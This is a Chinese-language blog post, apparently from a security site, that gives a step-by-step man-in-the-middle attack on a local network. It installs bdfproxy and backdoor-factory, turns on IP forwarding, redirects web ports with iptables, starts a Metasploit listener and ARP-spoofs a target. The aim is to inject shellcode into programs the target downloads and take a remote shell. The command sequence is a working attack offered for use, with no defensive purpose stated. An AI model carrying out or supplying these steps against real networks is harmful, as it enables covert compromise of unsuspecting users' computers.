最新消息:

内网渗透之劫持注入

Kali Linux Eternal 8999浏览 0评论

Bdfproxy 是一款基于流量的劫持注入工具。通过它并结合中间人嗅探进行流量的代理劫持,我们就可以实现对目标系统的下载文件进行 shellcode 的凌空注入。从而获取目标系统的控制权!下面让我们一探究竟!

kali2.0 默认已经集成 Bdfproxy 如果没有预先安装我们可以手动进行安装:

apt-get install bdfproxy

apt-get install mitmproxy ?(依赖安装程序)

apt-get install backdoor-factory?(依赖安装程序)

20161013114449

安装完成后,为了使代理的目标能进行正常的上网请求,我们必须开启路由转发功能:

sysctl -w net.ipv4.ip_forward=1

20161013114613

这里我们同时来配置下防火墙策略,由于 Bdfproxy 默认的代理端口为 8080 。因此,为了确保目标流量能通过我们的代理端口,我们必须将网页浏览的端口转发到8080 端口:

iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-ports 8080

iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8080

20161013114918

接着我们还需要配置下 bdfproxy 的配置文件:

vi /etc/bdfproxy/bdfproxy.cfg

 

20161013120126

修改如下配置选项:

proxyMode = transparent

除此之外,还需将配置文件内的所有默认 IP 地址修改为 侦听服务器 的 IP 地址。

20161013115231

现在我们就可以启动 bdfproxy 啦!我们可以看到自动生成了一个 rc 资源文件。

20161013120931

我们通过 MSF 来直接调用以上生成的 rc 资源文件:

msfcosole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

我们可以看到侦听已经启动!

20161013121020

最后我们要做的就是通过 arpspoof 来欺骗目标系统,从而实现我们的中间人攻击:

arpspoof -i eth0 -t 192.168.15.10 192.168.15.1

这样我们就大功告成了!现在我们只需等待,目标只要通过网页进行程序的下载,就会被我们凌空注入 shellcode 。 一旦运行我们便有可能取得目标的 shell !

20161013121548

转载请注明:即刻安全 » 内网渗透之劫持注入

您必须 登录 才能发表评论!



合作伙伴